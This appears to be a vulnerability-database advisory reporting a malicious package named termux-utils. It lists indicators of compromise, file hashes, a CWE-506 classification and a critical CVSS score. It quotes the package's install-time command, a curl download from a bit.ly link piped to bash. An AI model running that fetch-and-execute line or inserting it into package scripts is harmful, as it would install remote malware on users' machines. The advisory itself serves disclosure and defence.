VDB

GCVE-110-OSM-2026-1347

GCVE-110-OSM-2026-1347
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 3, 2026
Malicious package detected. Behaviors: network activity, install-time execution. Payload: libobjects.so Key findings: - Download and Execute in package.json: "curl -sL https://bit.ly/4d7AzZC | bash" - Binary: Network IOCs Detected in libobjects.so: "https://android.googlesource.com/toolchain/llvm-project" IOCs: - urls: https://www.contributor-covenant.org/version/2/0/code_of_conduct.html., https://www.contributor-covenant.org, https://www.contributor-covenant.org/translations., https://bit.ly/4d7AzZC, https://android.googlesource.com/toolchain/llvm-project - domains: www.contributor-covenant.org, bit.ly, libobjects.so, libc.so, libdl.so (+3 more) - sha256Hashes: 652217ee2eae053ac1d88dacb23b307f8ae452af66c9d1db5d79f3a58a773302, 09f7bd7a4048341872dccf1ab5b57a7327d8e06a525960742de7b1febf513616, f59f426259fbc6dcd70eb9c37a461a67d81e90b7df342676e5f64b6d44aa2391, 6ee59425b401218bc79b68fcc084408b21c85c0d23536740816ea48c1e6744af, ca4f6417adf73633682ada1f4d65ee8807510a3efc695e325ad64c1c8206bbe5 (+16 more) - binaryHashes: 0198af6b637126d5d80081ae5a76fa8491b11a547af2bb256e073191976d01e1 - payloadFileHash: 5ed4f8ccd02c354bfc516dcaf5d954dc192145504199e534b294dde27f19c3d9

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowntermux-utilsall (affected)

References

vendor

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›